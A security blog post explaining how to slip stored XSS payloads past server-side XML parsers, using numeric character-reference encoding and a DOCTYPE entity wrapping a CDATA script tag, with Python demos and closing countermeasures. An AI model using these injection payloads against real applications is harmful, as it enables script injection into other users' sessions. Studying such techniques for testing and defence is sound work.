Nowadays there are numerous web application frameworks for implementing rich web applications. I have already written about one of them. These frameworks usually use AJAX and XMLHttpRequest with payloads in either XML or JSON. In this post I will write about the XML part. In that case the first step is always to fight with the XML parser on the server side.

Injection attacks in XML communication are always a bit uncomfortable, because you cannot just write <script>alert(42)</script> in the XML: the parser will rip it apart, since it treats your HTML tags as XML elements. But nothing is lost; I will show two different techniques to trick the parser.

Unicode encoding

I have already killed the joke, but yes, the trick is Unicode encoding: you take your attack string and encode every character as a numeric character reference (&#N;, where N is the character's decimal code point). If you don’t have an encoder at hand, you can use one on the Internet (e.g. http://www.pinnacledisplays.com/unicode-converter.htm). You will still need to URL encode the result if you want to inject it directly into the request. Here is an example:

  • in plain text: <script>alert(42)</script>
  • after unicode encoding:
    &#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;
    &#97;&#108;&#101;&#114;&#116;&#40;&#52;&#50;
    &#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;
    &#116;&#62;
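
The encoding step can be reproduced without an online converter. The following is a minimal Python sketch, not the converter linked above; the helper name to_char_refs is made up for this illustration. It turns every character into a decimal character reference and then URL encodes the result so it can be pasted into a request:

```python
from urllib.parse import quote


def to_char_refs(text: str) -> str:
    """Encode every character as a decimal character reference (&#N;)."""
    return "".join(f"&#{ord(ch)};" for ch in text)


payload = "<script>alert(42)</script>"

# Same representation as the encoded example above, on a single line.
encoded = to_char_refs(payload)

# URL encode everything (safe="") so '&', '#' and ';' survive inside a request.
url_encoded = quote(encoded, safe="")

print(encoded)
print(url_encoded)
```

Encoding every character is more than strictly needed (only the markup characters have to be hidden), but it matches the example and keeps the helper trivial.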

In my case the parser happily parsed the XML and, due to the Unicode encoding, did not treat the attack string as markup; in the database, however, it was already stored as plain text. When my attack was triggered, the injection was transferred in XML again, but that didn’t cause any problem on the client side.
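
Why the string ends up as plain text can be shown with any XML parser. The sketch below uses Python's standard xml.etree.ElementTree as a stand-in for the server-side parser (the real framework's parser is not known here), and the <test>/<description> structure is only an assumed request body:

```python
import xml.etree.ElementTree as ET

# Assumed request body: only the markup characters are encoded here.
request_body = (
    b"<test><description>"
    b"&#60;script&#62;alert(42)&#60;/script&#62;"
    b"</description></test>"
)

root = ET.fromstring(request_body)
description = root.find("description")

# The parser saw no <script> element, only character data ...
print(len(description))   # number of child elements of <description>

# ... but the decoded text handed to the application is the plain attack string.
stored_value = description.text
print(stored_value)
```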

XML entity

XML entities are great stuff and allow you to do numerous different attacks, such as the XML External Entity attack or the XML Entity Bomb. But here I will write about their most basic usage. We will create an XML entity that holds the attack string and use that entity in the XML element where we want to inject. Of course not all parsers will allow you to declare a DOCTYPE and entities, but you can simply test it. Inject the following DOCTYPE at the beginning of the XML in the request:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [
<!ENTITY xss "foobar">
]>

And then use the new "xss" entity in the XML element where you want to inject. For instance, if you attack the "description" field, then the XML will look like the following:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [
<!ENTITY xss "foobar">
]>
<test>
<description>&xss;</description>
</test>

If the test string appears in the UI at the place where we injected it, then the parser expanded our XML entity, so XML entity based attacks in general are worth trying.
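
The same probe can be tried locally before touching the target. This is a small sketch that again assumes Python's xml.etree.ElementTree in place of the real server-side parser; the function name entity_was_expanded is invented for the example:

```python
import xml.etree.ElementTree as ET

PROBE = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [
<!ENTITY xss "foobar">
]>
<test>
<description>&xss;</description>
</test>"""


def entity_was_expanded(document: bytes, marker: str = "foobar") -> bool:
    """Return True if the parser replaced &xss; with the declared value."""
    root = ET.fromstring(document)
    return root.findtext("description") == marker


print(entity_was_expanded(PROBE))
```

A parser that refuses DOCTYPE declarations would raise an error instead of returning, which is the other outcome to look for when testing a real application.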

To inject HTML we have one more step to do. At this point we can inject data into the XML using entities, but it will still be parsed, hence HTML code still won’t survive. The last trick is to wrap the value of our XML entity in a "CDATA" section. It tells the XML parser that the string does not need to be parsed. I love this trick because it’s like asking the customs officer not to look into your bag. The great thing is that the XML parser (unlike the customs officer) will say "OK, no probs mate, off you go.". So if we want to inject the magic <script>alert(42)</script>, the XML will look like this:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [
<!ENTITY xss "<![CDATA[<script>alert(42)</script>]]>">
]>
<test>
<description>&xss;</description>
</test>

The parser will gladly parse everything except the attack string, because we said so. From there it ends up in the database.
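
To see what the application receives in this case, here is a short sketch under the same assumption as before (Python's xml.etree.ElementTree standing in for the server-side parser, <test> as the root element):

```python
import xml.etree.ElementTree as ET

ATTACK = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [
<!ENTITY xss "<![CDATA[<script>alert(42)</script>]]>">
]>
<test>
<description>&xss;</description>
</test>"""

root = ET.fromstring(ATTACK)
description = root.find("description")

# The CDATA section is delivered as text, so no <script> child element exists.
child_count = len(description)

# What the application would store: the raw HTML, untouched by the parser.
stored_value = description.text

print(child_count)
print(stored_value)
```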

Countermeasures

I cannot give a straightforward technique for protecting against this attack, because it mostly depends on how much control you have over how your framework handles XML. Still, there are a few things you can try:

  • If DOCTYPE and ENTITY declarations are not used in your application, you can try to disable them and reject requests that try to use them.
  • Validate the input after the XML parser has processed it.
  • Escape the output that is sent to the UI.